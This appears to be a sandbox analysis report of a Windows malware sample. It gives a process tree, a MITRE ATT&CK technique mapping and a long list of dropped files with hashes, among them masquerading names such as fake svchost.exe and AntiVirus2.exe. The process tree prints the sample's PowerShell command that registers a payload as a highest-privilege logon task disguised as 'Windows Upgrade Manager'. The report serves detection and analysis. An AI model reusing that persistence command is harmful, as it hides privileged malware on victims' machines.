C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:4428
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Windows Upgrade Manager" /tr "'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe'"
  2⤵
  - Creates scheduled task(s)
  PID:3120

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:8048

C:\Windows\system32\taskeng.exe
taskeng.exe {018762A5-1BBD-48E2-A70C-7B0C122CE5DC} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
1⤵
PID:3208
- C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
  "C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
  2⤵
  PID:7260

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240522091644.log C:\Windows\Logs\CBS\CbsPersist_20240522091644.cab
1⤵
PID:5484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Media Player\wmpnetwk.exe

Filesize
23KB

MD5
90b85ffbdeead1be861d59134ea985b0

SHA1
55e9859aa7dba87678e7c529b571fdf6b7181339

SHA256
ed0dc979eed9ab9933c49204d362de575c7112a792633fda75bb5d1dab50a5c2

SHA512
8a1c10bbfe5651ab25bf36f4e8f2f65424c8e1004696c8141498b99ea2fbd7b3e5fae4d2cfee6835f7ff46bd2333602f4d8ac4a0f5b8e9757adb176332a3afce

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
853332869195076f3e117a313321ec66

SHA1
44fe7ebe3967c79b44113f0d8313c4bb21f1b555

SHA256
8954b9386b3f9805ff8463b1248688c3b7ad9401874aae0a2ba5de44379a8fd3

SHA512
c9b1f6fbbb8cd744114acb8b45e85bd2573d1f5bec91f5b7a935327683dca7d70453f7f74c903c03466a7ddfe5ce60cbbd5ba73b835eaf6bdd033fb4f1d9d303

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
62302c9e2c587ee8b59c1a6350b03bc8

SHA1
f133a09db12b611aface1768d2f862bd5be5f389

SHA256
fc5fe54b2376483cb5aa2997e29648d21946d78b762535b80201d03da53ad1f8

SHA512
01c8b0f76f14117fb25de2784d34d44b80adad360902165fe2beb10d67f72cd9016f1607bccee51b065a6fa402ddae09a6cb23c4939b0056ed54c5e44089eea4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
fca1a6c9f203b896177e7950c4adbbb2

SHA1
f4bc9c7356dae41e533e79c25a0e78de2b106b2f

SHA256
71a214ea563d2699e8ffb90ce137af197745b2a3c5e894e66e93b8d064449c1f

SHA512
07d66ec0ce7f33ff09f7993b124007d337e844cf6a0ab52e37cacc0bef193d19fad9a97e00a62a614609d935544bafd2f241a9b70033cf26cc555408ad4c916e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
80262d95f630fb695054068a5f3ab711

SHA1
44bfb3759e369d21e9054e715cc7a6755d6ed0b8

SHA256
6a755aeb9e79364c1c594f3c8069e7bc15ee82cda3d32d402e1b5a52f6649c81

SHA512
90780940f2fc84abc19d4d7012584213bfddd14266040b9e6509729377f8327c7e8ea5735e3c36d71d8b5b808cc0cc665331def1ba76419f2ab8161eb8791141

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
fb95f7d522967f3242b15a5448373348

SHA1
bec32e9e6192c6f76e137f37a1d33a56f2dba3b6

SHA256
e654902d15daeb9031ad41e6511536659de9b1cb1665862853aa23b1213c00db

SHA512
0412a9f48843617932cb451df77213c406f126ae374d2a996272eaeb183bfaa389131b669de9db1190461c1d215bb93b1dfd9a067814100886fc5d6c88d43e9c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1253913ed3e4bee6e0cb2daae921053a

SHA1
886b408c5a6e66151029a658000765d30988713f

SHA256
f9b05b2713b818f8da1470968d352c9eb060c22540227f294694ac8cd691c7c9

SHA512
2533eccdc1005f537bccf2e5e40b9258e4bf04ef2e40b9b498addd169203897c22a81441064f02b97f1c5c6150003a26762dd2c41eed9d8c5ba2983a9b58ae48

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
eecf785efd47b084548be50b81db40db

SHA1
a6d1caf65aa6c7b262c6905ace3206d29b4eacee

SHA256
1002cd38ce36a384cfedd74e32daf62277bb99a8ff1549b31997dd59fa5105f9

SHA512
1c68432a79fbc8110d11489fb4d2ab1620ef827c4ca370f534d1b5421c23be5ca2da8144186a2943da292dc5f5216fca73a14aa0342662bc851e6039dae8795a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
f3b870fe0a3b89103cb6da1a627bb700

SHA1
3b280ba92e6bd7705bd3288986a6a2488f50470d

SHA256
54698c60e5fe7aa6ec377079a60311d35a5ce8ae2bf15bef09b520e28c8e669e

SHA512
c9db1b101d9a481f26edee0e05c4c681234d80731abe2bdb0337a1ba5d8649ff29c7db1a2e70cfa77abf61dd3ced1facd529dff7dde4b1f3d0f7f2729fb22aba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\335903\Joint.pif

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1302724224.exe

Filesize
8KB

MD5
87b22e975994246dc5b7c2a3adbf85a5

SHA1
1e6528987190f0f5188240cdac553388c39e8590

SHA256
17399263a05a9144c1571e8ef88175fd08c61a38e3fcb3a955279d4a2bb9a919

SHA512
58c33379879fc75679902d1fe3db0bf1c854151cb6e4bf10496a1d657a8778699be70976bd8bba1ddd3949b24b6ae44cbc0421dd0a8cea13ef5e00179d6599db

Download Submit
C:\Users\Admin\AppData\Local\Temp\1699713940.exe

Filesize
10KB

MD5
c8cf446ead193a3807472fbd294c5f23

SHA1
2162f28c919222f75ce5f52e4bb1155255ae5368

SHA256
e5d12658a690c62af7d4fc7b26735affc7210e3bfb6b2241de1bf90aebdc0717

SHA512
fc94014fabf204ecd57990db4b05b81cbda0a314b621cbfa755296ddf5493ec55fb129d12eff5f92863d9f1d7fea679dc2aeb62baf898791448cb4fe34b595c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1773630283.exe

Filesize
11KB

MD5
cafd277c4132f5d0f202e7ea07a27d5c

SHA1
72c8c16a94cce56a3e01d91bc1276dafc65b351d

SHA256
e5162fa594811f0f01fc76f4acbd9fe99b2265df9cfcbc346023f28775c19f1e

SHA512
7c87d1dec61b78e0f223e8f9fec019d96509813fa6d96129289aab00b2d6f05bf91fe1fafd680b7d9e746f4c2c8cbe48a3028bcaad479048d00d79a19f71b196

Download Submit
C:\Users\Admin\AppData\Local\Temp\283765726.exe

Filesize
8KB

MD5
11d2f27fb4f0c424ab696573e79db18c

SHA1
d08ece21a657bfa6ea4d2db9b21fbb960d7f4331

SHA256
dee9dca027009b7d2885ace7b968d2e9505a41b34756b08343338f8ef259e9be

SHA512
a60de41caa6113430ab4ab944b800579f574f9b964c362f9c62bbfc1bd85dccd01b628809367e15cfe6baaba32c1255f8db07e434ff7bcf5e90d9b3d1f6a4cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bb17620

Filesize
1.7MB

MD5
3db39aa30df77ddcb2e5b50998a869f4

SHA1
fcfaa9cadaf8332aa6eb4c438036ff17a2899cc9

SHA256
57387226ddda11faf8909e4edd47ae3d4edac978c035308ba63a5686e580e52a

SHA512
596e9833febcdb4c1e84d79258cb305618a252f35d4760be7be695c7abe4ee014b085a7afc33fc6252f0c93affcc8ca405915b8942bd41e736c3a3cf3ab48ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\3031322510.exe

Filesize
10KB

MD5
47340d40e7f73e62cf09ac60fd16ad68

SHA1
effd38f6561155802d3e5090f5714589eae5ce6e

SHA256
e8a0c46342abd882318dbfdb17b7d3cb93d7138564878a15c5b91229ed81689c

SHA512
2d5fbacad67eba3c42c2be95c3bf64d787d15cf96d5afe827d6f9bdb175295859e684202ff5afc773202f4b9d0b3135e913c997bbe72026cd7a7ca96ecf5aa08

Download Submit
C:\Users\Admin\AppData\Local\Temp\30b3c3bc

Filesize
1.7MB

MD5
7852f37f58a552180c6b3d1235ab66bd

SHA1
052ec66fcf13f2781dc1229ae7c10325659900a0

SHA256
73f30cdf4cd00a387b5c5470db2eeaf34ce8a64d165c5614b29876e7a763d488

SHA512
51df0027aa88c49bb0cf4a9bfc6cb9a4af3991b38d11f33f914e3cb8ec1ecb587bd982e4cccd0eca6480cfa161743df9f4ef4b98576ed8533ed13a530a55d294

Download Submit
C:\Users\Admin\AppData\Local\Temp\767226468.exe

Filesize
93KB

MD5
a318cc45e79498b93e40d5e5b9b76be4

SHA1
4ebc9969cc3c330741c377e22a5fb0cdb8ce5fd5

SHA256
4b4e596641d0dd9eece8a24556fd1246056cbc315a79675a7400927858bbd7c2

SHA512
3131d627837a3cafdf532173ccadd4beff933ee3d5e050366153434b1394c4d57056b4d273ddb826a1a0478caa83e1f6e095e83366102ae1d3705ab2d3ec0e2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF

Filesize
14KB

MD5
a407c54a89a1dc65074b2f09b8664f34

SHA1
b7d984e56575de4fe305e3b2b386f20810e69953

SHA256
938d9f85529b66633c6174ebc191774836d5627ca00522934ce67d893f2078f0

SHA512
7cad8abee45167e807c2ee399e8ea0287be5686853a20ea929b4ae9a2229bc11623ef3087c58355d124dd2841a5e7afd852fc746041bd5e3b5fe787326509da6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1692.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe

Filesize
20KB

MD5
de36bc2bfc3c67820ebd75c912fadc3d

SHA1
38bd51e1052ae5bede5293827e87d6f494b204c8

SHA256
2a5083d6e55f5cb56764fc4ed7ad082a0ef75a908ed03132178cc80f802c3d16

SHA512
efbc8a797e95f00c142c4c02c2f3faf4f46fabcdcd1a99d81df7581244a22f0b81f846d15de3b5f4b6d323deff555fd569db57aff3171ffebf27c03e4d53e6ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\64.exe

Filesize
7KB

MD5
e1517885f6c71f7b3dafa6d4610c4762

SHA1
01edbfd0a59d9addad0f30c5777351c484c1fcd1

SHA256
4456f9a5d25296d8e6e184d50ec5355f01848263ce32e8379120a1077194a5ba

SHA512
4c947836d668dac764f0945c3438a0e1aae6c647560907a96096a6af9795a4b753f1c138e526d06029d364a28e900cbca07566c56df14764d232e3bacbca6c93

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe

Filesize
436KB

MD5
46fc9e5e1fbeed55281cd5f25310f8d3

SHA1
be6bb9f76a2545781a628690602eab704ce1e64b

SHA256
0494a21fd6ec0405206dbe6c82525b895f09ff4c240a301e1baae682c5ad80a2

SHA512
c7b3a65f50a6e0bffea72a215fa717378c93d767d287c711912dda55dff6294bd2266a502cfe80aea4c6bdaae03170bd5b50bdcc175bcd146c6a79ed7bee0b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe

Filesize
5.0MB

MD5
a4e84bdb6fba7b3c5689b0f2bc5ec858

SHA1
6ef4aaf5a594b23cb64e168824b1fc2376cf6c5e

SHA256
48605846c229a73a9695d0a6567982bb558e5108b2251b74ad2cdba66e332632

SHA512
c2241abab28b6d31f33fb17b89983fbfdfe03d55ca1078e8de29e4b56328ed5933c577c0e0865d8edcf897b9d752e8a011a22297f9d87cb683ce9f0522f763ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\alabi.exe

Filesize
435KB

MD5
794a7bc49c07d085d9e3cd15515f961d

SHA1
ba3c257dc49a4fef8f59465b179b505db096fe33

SHA256
3ba0f4f8645247e4f440e38ca2b0f91bed5d239452e97054e75e25d371ec4d98

SHA512
6d56bbe23e395fa4839bc96e4632e6e98b2834b0a11fb34322c96f50a2b734f7a0d00f2c5b458766e389c739c3d5d03fec661038737ff6c340e3a7754a6b2f97

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\cmt.exe

Filesize
8KB

MD5
dc0d40579447b035d980cf0b8cd7667c

SHA1
c907f983cb27d5caec6c941e0712afcc973487d0

SHA256
36ed94fb9f8ef3f5cbf8494ff6400d0be353ae7c223ed209bd85d466d1ba1ff7

SHA512
ed37522b52b617877b5e5f7023a0138baf396c0b33393d6155dbb6bfa4b3347b737e5493cbde634fa1937d0094a7b9b543929e6f32b35331a8c6dc838f38d51b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\conhost.exe

Filesize
2.5MB

MD5
be320b59ef29060678bcb78d6c8fa059

SHA1
eb76091dc908c5bcf1ddd24900f53b6d9119bf53

SHA256
9fdadcad0d51590fd9b604d464cdac18c9b34d43b4194c7d54110b299a841145

SHA512
8015324abb929d2ff22c1ba96bf79fe2393a16ad9daa93caef756ab41122b9e582fca68aaf8b625934aad3140223db6928a105633bb5ca209a2a3980383383fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\crt.exe

Filesize
5.2MB

MD5
1e9371c7eb8b2ad613afd09eab341887

SHA1
845e0f5c40104d431b8f690754671bd7c3531fc8

SHA256
88198ae8178cf02f541c8bd9211d73697ca68a643f1622b858063e3639e0aa27

SHA512
868574b6a840a05790b795669a02f12b73be1524c216222f79c4d1f61eed4292eecd4436aca697938e6675ebb765f5e5ca02fb6736824080dff18b112e649026

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\nine.exe

Filesize
262KB

MD5
dba3846a51c92775dac4fe38fe1565fc

SHA1
fde82884cf24699f55378ced90a106d0d370b033

SHA256
b2e7222f8455e06b6d44d193106363480124505df582b5d544df23e579aa325b

SHA512
b8b2f71d91e4a1c44b5f5c634e67bbca7e0424e78ede4607920fd87b0c81d71a41d21ca1a55e3ad6f000ee067f5dcd750ee341f8ec1238042fe1db30cac38bc0

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\output.exe

Filesize
5.5MB

MD5
461e951ba79964b681e9a8bc9d61a92c

SHA1
c860285cc237d35022fea21eba03c82e86ea3d1e

SHA256
de36e0af9cd7e32d781be2ab937a7dca33a9f93dcbecd06ff944641e5196c51f

SHA512
b85af74593267854a24d9a03a046c3d00cfd25401a9b304061f508d46c559e4773801dda28c0a54c15b2c9334fbfa2f391be9194828334cbe4be50811ed0c19f

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\print.exe

Filesize
2.7MB

MD5
6ea7a8430947755910dd530609ccd33c

SHA1
7afcd8da78c756f05dc245028e878bd9396722c6

SHA256
2ac2391710994cf90972b425abf650ec47326ec9a51063e94fc1bfa27d9b1f7c

SHA512
38a5aae0d369b744d6b28a56cff7c2a7c0fc94916cee6f6bb578e482682a3587757eceb3a9cd52731a7cfa26d49b3bd43fdbd73883511678c9659a5d6405946b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\pub11.exe

Filesize
4.1MB

MD5
879254e27447aa757455bfe4811f6da3

SHA1
ba82bb3d067fe30315e6b7d5dfff2dd17f7a250c

SHA256
62d9a43f922c445d18718e78b5214a3f850822e0f99b0bd69c87496fa7681dd7

SHA512
7a3b4fabbccf5f4757e9da8a2a894f446e93b3cfd9b483afb467d8c3359aae00839b88ffe420a0228540265ee068117803c5da62832273f8463070eeb6daa3ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\reverse.exe

Filesize
72KB

MD5
94604756b7991e2361c98c1ffd1a50ff

SHA1
b72f2589a2ad566cf45b58965721abf2ddd5c7f7

SHA256
7c2465e391b9f2bd8b257e5c8eef9ea09201c08c44f7b76d01467dcf1db52556

SHA512
68d959e6be422cf7ec23a439f30235b8f48f4e7dfffaf3293382100442f1f913d65b9f33f14fb98a54d7e657e294b645356150430730f5faf14ed95ef40b8a81

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe

Filesize
2.1MB

MD5
8da5f3d5477e870f00e2d5af6e50a0a2

SHA1
c596b93af682d40f87f14f29b815639b0ce0ebde

SHA256
17d9a25d421e02c4ddf2ce3da57224c02e5f8bb923b6a5eab3b65b7c4733318e

SHA512
2e97f5618c5f194331290412d9a7157b6c5ec932d699b6c70073d0c6c82a626a7cd3b1c00d4f135070fbbea25660870ef0f115517209dd49838674331470aeb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe

Filesize
36KB

MD5
f55d89f82515bde23bb272f930cb9492

SHA1
666d0f5a98f03292abf16cd2de599997c836926a

SHA256
4d9fb14e15d1613a7a5d70efbacb0f153729f02216116c3f7f117b033bd7655c

SHA512
a7a62daf90aae27207b77034e8a76d5b3f8aa05430bd8768d46be7f3843962ddc1ef154691dc0f26051605fbb36269e59f18c3c75fdf72222346188e7a6cf03b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe

Filesize
104KB

MD5
9a24a00438a4d06d64fe4820061a1b45

SHA1
6e59989652dff276a6dfa0f287b6c468a2f04842

SHA256
66944b456b33438cbf93d112d973112903f57dc16bf4c069e968562fa8f01b54

SHA512
80e97c8c389554ba0512b7f496dd03e82f2a627568eca631a6393033d540a70779fc7eae2485d1b9ca3657beb8ae9a86fd08ecd5dba678407bf8e63bef9a4629

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\win1.exe

Filesize
73KB

MD5
26125c571d6225959832f37f9ac4629a

SHA1
ed7af3c41eaab7b10a2639f06212bd6ee0db6899

SHA256
94fada921a79c422e6dbf75eeca7429690d75901b5ef982a44874971b38708a0

SHA512
172b72f2a92c5ea119ee9369c91f6fb4431efc95fd7c1dad65c1d45886ae17025e55d7a2bf9bfbae6f163928799f0b79dc874ed19383aff281f5466a81b590d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\kat3C07.tmp

Filesize
861KB

MD5
66064dbdb70a5eb15ebf3bf65aba254b

SHA1
0284fd320f99f62aca800fb1251eff4c31ec4ed7

SHA256
6a94dbda2dd1edcff2331061d65e1baf09d4861cc7ba590c5ec754f3ac96a795

SHA512
b05c6c09ae7372c381fba591c3cb13a69a2451b9d38da1a95aac89413d7438083475d06796acb5440cd6ec65b030c9fa6cbdaa0d2fe91a926bae6499c360f17f

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\KillDuplicate.cmd

Filesize
222B

MD5
68cecdf24aa2fd011ece466f00ef8450

SHA1
2f859046187e0d5286d0566fac590b1836f6e1b7

SHA256
64929489dc8a0d66ea95113d4e676368edb576ea85d23564d53346b21c202770

SHA512
471305140cf67abaec6927058853ef43c97bdca763398263fb7932550d72d69b2a9668b286df80b6b28e9dd1cba1c44aaa436931f42cc57766eff280fdb5477c

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
1.6MB

MD5
6f4dc951bbb91da352f1b1736b9551dc

SHA1
c94c3fbb3a830f8a3f98963eef485ecbf7f8487b

SHA256
ffeeaa61d3e4e3aeedbd1303757049b46e30bad6445e6d78f02efce265071404

SHA512
da41d47ce5f4599bb7acbf71cfd22980f2f0f2cd74aecf1dc9664f349815a44389f13c0c2c70a89812ab665fb4b932f64f0a48664d63206e22db655f223406ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
468B

MD5
1005b0d4f17c3e5c9a8c0e89f3943c63

SHA1
5d5e9a7ad0c21cb256f7381cb1fd414aff83d102

SHA256
db61ff7a98d6279ae8db81c9713407f42f673da134d2b12d31d0bae0a3eb00e7

SHA512
845c09bded690af0563c6f94357d591425604b4d34404c46caba5295c192dd7eb66b620d2656b4de6a26f90657e08f591b9b46bb3d821d5344329727f37d5540

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
473B

MD5
90e153a30b2512f21ecbceeb1a829aea

SHA1
5f4aae30e1821fc3c60316f52716059b02ce2d45

SHA256
d14a335b14e94ce26c9cf4e864f76d610ef19ddb20189ef8c75ad65e786ad0cb

SHA512
9f861fac2920b510267479681177fe79d8dbd8f0f8f744efdfdf11c14bbb03cc6b868ffd8d5dfa28727e5affebb554b7b6e5a3f8e2a7101dae68dee816d2ca9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
475B

MD5
6236ed9238a2753fe6cab484677cba1e

SHA1
92ce99aee89711734c112d43f4552af678214049

SHA256
2cb65546bdc11dc5af4d364274ae75a931cd2f3c4a2e7c43d95fff69558646ad

SHA512
43c55bbef46af566496559914fdf8e3399f935140b78c18ca4e4c0fa5f5de7d5c8d7dd57e8f50913a18d7bf4f5d29ea28ec0664e2691483932d934d123b05741

Download Submit
C:\Users\Admin\AppData\Local\Temp\mdnsresp.exe

Filesize
419KB

MD5
8a716466aa6f2d425ec09770626e8e54

SHA1
62fb757ea5098651331f91c1664db9fe46b21879

SHA256
585d1fb4f288974b683c5abfb10c97d7d2ae3f59c2bcfd78ba272e3be2cd7815

SHA512
54f11067e400347834689b4532ae53b00ec96a3ca90a2c21de27942f4ca30306fdda0522c1a3a4cde047ad650162e2d8313205220acaab4cc60e010965690940

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
39fdd3c3d23bab90610e2cb3cf1168f5

SHA1
5430b6a314608fb17bcb41888810a5eef7fe6260

SHA256
81637cfaee8d74aa191c47e48da82a6de2e6d8830ed5e3d80baab82af71d64fb

SHA512
b6438d55d3d3830e64f7197ab515dd4dc226fd77e00b5217ae2a8c4e8d911be5c48c54b2299457d1a8ec0b775cdb709d64d377b8315e34158cdc1c8be71db224

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HKVHGEI6NJORP63I92ZM.temp

Filesize
7KB

MD5
78b887b3265947ea1704a46d5baaafbb

SHA1
32eaf1131ba8652f67b8727807472d618006ec45

SHA256
2072db7dd2e3ac35b90f8b641e0744ccba55809f14feb68cc4590f40abce414d

SHA512
55f4526491b19a78db6b4ab8556af77e06dfe57f8fdc063e4774e8eab93830419d55306fcf185c91f401fb4c533319ac08a18e5f926d4314ff635f5b16599498

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R65AH0FLDSKGVAR5CV48.temp

Filesize
7KB

MD5
18a487d8759e9af742f80a2c6ff28aa1

SHA1
bbc3c8773f8afb59cca4d702a23af9262349ce49

SHA256
3bd946a50a2010ece5033c10fbc712d79818bd8364d416103496cc4cc20a38ad

SHA512
115125355637a9ba9e049bfac6fa9731ab0d2bab48c21bcc1c8546332bc432e52186d3d6fa9fe5488ec38a77d6e263a1d2cd23ba41ae8f75488192a5cf0fccda

Download Submit
C:\Users\Admin\AppData\Roaming\taskhostw.exe

Filesize
75KB

MD5
84db43a164ce3f375e38430aa3c817c5

SHA1
7e65f3e57b37f3b184666277df75f645d3a7cc19

SHA256
1b2fee364fcde4a8e05a7f7a08f6fa68141e5ee6492a0ff23328d6e94a87925a

SHA512
82f4c2a54a06cd00c47f19d55e9a6f09b2ce0047b9a861f1bb3b9f7272b29504fa98f385b3fc1dc7f1aaef90755ee1990aa0cf38b956db5504301cf72927212e

Download Submit
C:\Users\Admin\Windows Upgrade\wupgrdsv.exe

Filesize
5.4MB

MD5
41ab08c1955fce44bfd0c76a64d1945a

SHA1
2b9cb05f4de5d98c541d15175d7f0199cbdd0eea

SHA256
dd12cb27b3867341bf6ca48715756500d3ec56c19b21bb1c1290806aa74cb493

SHA512
38834ae703a8541b4fec9a1db94cfe296ead58649bb1d4873b517df14d0c6a9d25e49ff04c2bf6bb0188845116a4e894aae930d849f9be8c98d2ce51da1ef116

Download Submit
C:\Windows\SysWOW64\slwga.dll

Filesize
14KB

MD5
788a402d0fcc43662ba8b73c85c63c7f

SHA1
d5cec0d57a7516db6cdecbdc3d335db24444037b

SHA256
79950cff432a65ddf605b7194ded9529849108f6f3e0f6a44541d0f1f90e0f60

SHA512
8c52d8cf92429314942cd198e8aeec0b9d8f5b93e6545993eb69f6c00e59dbff29e83c6a65ef31e7faa5ef60965d7bf075846d4b6b88880b4afe14957620213e

Download Submit
C:\Windows\SysWOW64\sppwmi.dll

Filesize
116KB

MD5
bad4c7c3c11d8bd6b7f81887cb3cac5f

SHA1
80e23c13e67e6af29a2deb31a643148e69887c53

SHA256
a409caf11abd17ca932c2e6269e0f024cc781aa6ae9d56ba94a367b6239422b4

SHA512
27864f4f206661e427d371df93a15d7e818ff45fc3a7c10005f7e260b7106dc77a8437411f2c2d2d935b481771975ad354d051b3c1ae2ab5b010ea3d8b89a8b8

Download Submit
C:\Windows\SysWOW64\winver.exe

Filesize
12KB

MD5
161a5f076af5f6268665ebbcf53a4937

SHA1
1cab495c456d4d7dfc936a13b800884af8554704

SHA256
62977bb66738ef09910c2e30c5e09cf462a82144b4ad91f0ad42a83b2f994f55

SHA512
